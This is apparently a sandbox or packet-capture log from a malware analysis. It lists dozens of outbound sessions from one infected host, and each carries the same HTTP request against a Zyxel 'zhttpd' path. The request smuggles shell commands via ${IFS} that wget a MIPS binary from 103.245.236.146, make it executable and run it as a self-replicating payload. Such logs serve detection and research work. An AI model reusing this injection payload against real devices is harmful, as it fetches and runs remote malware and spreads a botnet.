                                                        Jan 28, 2024 10:13:05.647846937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7525192.168.2.1459258178.92.122.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647876978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7526192.168.2.143696074.126.248.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647902966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7527192.168.2.1445902170.32.242.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647955894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7528192.168.2.1443958125.101.56.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.647984982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7529192.168.2.1452052180.3.177.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648017883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7530192.168.2.1439010202.85.228.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648051023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7531192.168.2.144181274.171.9.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648092031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7532192.168.2.1450844209.200.142.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648113966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7533192.168.2.144241860.221.94.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648145914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7534192.168.2.145772457.112.65.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648197889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7535192.168.2.1453346136.107.213.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648217916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7536192.168.2.1435302223.176.151.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648256063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7537192.168.2.1454376125.6.145.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648297071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7538192.168.2.1447622188.232.39.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648319960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7539192.168.2.144136840.240.148.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648371935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7540192.168.2.144581236.162.35.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648394108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7541192.168.2.1432972140.26.84.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648441076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7542192.168.2.143602098.174.32.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648498058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7543192.168.2.1458082154.200.226.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648545027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7544192.168.2.1456528171.224.227.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648578882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7545192.168.2.1450978101.121.114.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648626089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7546192.168.2.1433508154.155.98.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648686886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7547192.168.2.143515669.161.33.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648718119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7548192.168.2.143744474.175.29.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648752928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7549192.168.2.1456678103.202.160.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648798943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7550192.168.2.1435730172.40.206.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648821115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7551192.168.2.143353638.168.198.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648878098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7552192.168.2.14425205.65.19.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648899078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7553192.168.2.144389451.209.75.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648945093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7554192.168.2.1453644197.147.99.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.648976088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7555192.168.2.1437954147.134.205.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649004936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7556192.168.2.145613277.125.92.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649034977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7557192.168.2.1437000222.119.72.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649087906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7558192.168.2.146054488.175.134.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649122000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7559192.168.2.144694262.125.40.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649149895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7560192.168.2.1450906170.233.204.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649189949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7561192.168.2.1438214179.125.121.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649240017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7562192.168.2.1448094165.89.201.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649257898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7563192.168.2.1437598120.71.145.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649302959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7564192.168.2.145160654.178.194.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649332047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7565192.168.2.145025817.199.115.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649354935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7566192.168.2.1443920183.9.234.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649418116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7567192.168.2.1452874147.8.99.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649548054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7568192.168.2.1434614219.148.14.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649575949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7569192.168.2.1458282164.55.172.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649632931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7570192.168.2.1448174102.144.210.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649672985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7571192.168.2.1446950123.16.236.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649693012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7572192.168.2.1445576190.46.169.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649734974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7573192.168.2.144543017.192.17.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649761915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7574192.168.2.1457274196.171.131.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649811983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7575192.168.2.1443746141.206.230.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649847984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7576192.168.2.143437885.255.61.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649909019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7577192.168.2.1439012101.253.129.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649945021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7578192.168.2.1440148124.83.4.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.649996042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7579192.168.2.1434480133.199.46.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650022030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7580192.168.2.143682425.145.124.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650064945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7581192.168.2.1436074221.176.97.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650095940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7582192.168.2.1436286219.34.197.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650160074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7583192.168.2.145947843.29.195.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650182009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7584192.168.2.144696448.4.64.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:05.650228977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7585192.168.2.1449928105.144.91.208443
                                                        TimestampBytes transferredDirectionData
